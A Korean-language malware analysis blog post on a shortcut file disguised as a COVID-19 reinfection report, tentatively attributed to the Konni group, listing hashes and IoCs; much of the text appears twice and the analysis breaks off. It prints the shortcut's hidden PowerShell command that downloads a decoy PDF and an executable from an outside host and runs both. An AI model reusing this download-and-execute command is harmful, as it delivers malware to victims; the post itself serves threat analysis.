북한 해킹 단체 Konni(코니) 만든것으로 추정이 되는 악성코드-국내코로나19재감염사례현황.pdf.lnk(2024.10.5)
Contents
오늘은 북한 해킹 단체 Konni(코니) 만든 것으로 추정되는 악성코드 국내코로나 19 재감염사례현황.pdf.lnk(2024.10.5)에 대해 글을 적어 보겠습니다. 여기서 어디까지는 Konni(코니) 인것 같다는 것이 공식이 아닙니다.
코로나 19 는 2019년 11월 중국 후베이성 우한시에서 처음으로 발생하여 보고된 새로운 유형의 변종 코로나바이러스인 SARS-CoV-2에 의해 발병한 급성 호흡기 전염병입니다. 아무튼, 현재는 블루 단계 관심을 두세요. 단계입니다.
일단 해당 악성코드 이름을 보면 국내코로나19재감염사례현황 인 것을 보면 의학 관련 종사자 분들이 타겟이 아닐까 생각이 됩니다. 어디까지나 私見 입니다.최근 코로나 19 가 유행을 한다고 해서 아마 유포가 되는즉 합니다.
먼저 해쉬값 입니다.
파일명:국내코로나19재감염사례현황.pdf.lnk
사이즈:127 MB
MD5:1f96ef9c871f24720c7c05055ad99c78
SHA-1:02cf6a1a8b6a06eaa92d3f0302a56507e0bd55b3
SHA-256:b9766b61ab05673e2945476d2cf5209345c06edbb4a90d6885de96ec03ff69b9
입니다. 이번에는 파일 크기가 100메가 이상 넘어가는 것을 확인할 수가 있습니다.
일단 02 01로 인생 복잡하게 더미 파일로 돼 있는 것을 확인할 수가 있습니다.
실행하는 코드는 다음과 같습니다.
StringData
{
namestring: not p(r)esent
relativepath: ..\..\..\..\Windows\SysWOW64\cmd(.)exe
workingdir: not present
commandlinearguments: /c powershell (-)windowstyle hidden -co(m)mand
"Set(-)Location -Path 'C:\Users\Public'; Invoke-WebR(e)quest -Uri \
'hxxp://172(.)22(.)224(.)1:7777/123.pdf' -OutFile 'C:\Users\Public
\국내코로나19재감염사례현황(.)pdf'; Invoke-WebRequest -Uri
'hxxp://172(.)22(.)224.1:7777/1(.)exe' -OutFile 'C:\Users\Public\1.exe'
; Start-Process -FilePath 'C:\Users\Public\국내코로나19재감염사례현황.pdf';
Start-Process -FilePath 'C:\Users\Public\1.exe'"
iconlocation: C:\Program Files\Adobe\Acrobat DC\Acrobat\CrashReporter
Resources\AdobeLogo(.)ico
}
악성코드 분석
powershell -windowstyle hidden:PowerShell 명령을 실행할 때 창을 숨기는 명령어 사용자에게 명령이 실행 중임을 …
코로나 19 는 2019년 11월 중국 후베이성 우한시에서 처음으로 발생하여 보고된 새로운 유형의 변종 코로나바이러스인 SARS-CoV-2에 의해 발병한 급성 호흡기 전염병입니다. 아무튼, 현재는 블루 단계 관심을 두세요. 단계입니다.
일단 해당 악성코드 이름을 보면 국내코로나19재감염사례현황 인 것을 보면 의학 관련 종사자 분들이 타겟이 아닐까 생각이 됩니다. 어디까지나 私見 입니다.최근 코로나 19 가 유행을 한다고 해서 아마 유포가 되는즉 합니다.
먼저 해쉬값 입니다.
파일명:국내코로나19재감염사례현황.pdf.lnk
사이즈:127 MB
MD5:1f96ef9c871f24720c7c05055ad99c78
SHA-1:02cf6a1a8b6a06eaa92d3f0302a56507e0bd55b3
SHA-256:b9766b61ab05673e2945476d2cf5209345c06edbb4a90d6885de96ec03ff69b9
입니다. 이번에는 파일 크기가 100메가 이상 넘어가는 것을 확인할 수가 있습니다.
일단 02 01로 인생 복잡하게 더미 파일로 돼 있는 것을 확인할 수가 있습니다.
실행하는 코드는 다음과 같습니다.
StringData
{
namestring: not p(r)esent
relativepath: ..\..\..\..\Windows\SysWOW64\cmd(.)exe
workingdir: not present
commandlinearguments: /c powershell (-)windowstyle hidden -co(m)mand
"Set(-)Location -Path 'C:\Users\Public'; Invoke-WebR(e)quest -Uri \
'hxxp://172(.)22(.)224(.)1:7777/123.pdf' -OutFile 'C:\Users\Public
\국내코로나19재감염사례현황(.)pdf'; Invoke-WebRequest -Uri
'hxxp://172(.)22(.)224.1:7777/1(.)exe' -OutFile 'C:\Users\Public\1.exe'
; Start-Process -FilePath 'C:\Users\Public\국내코로나19재감염사례현황.pdf';
Start-Process -FilePath 'C:\Users\Public\1.exe'"
iconlocation: C:\Program Files\Adobe\Acrobat DC\Acrobat\CrashReporter
Resources\AdobeLogo(.)ico
}
악성코드 분석
powershell -windowstyle hidden:PowerShell 명령을 실행할 때 창을 숨기는 명령어 사용자에게 명령이 실행 중임을 …
IoC
1f96ef9c871f24720c7c05055ad99c78
b9766b61ab05673e2945476d2cf5209345c06edbb4a90d6885de96ec03ff69b9
02cf6a1a8b6a06eaa92d3f0302a56507e0bd55b3
b9766b61ab05673e2945476d2cf5209345c06edbb4a90d6885de96ec03ff69b9
02cf6a1a8b6a06eaa92d3f0302a56507e0bd55b3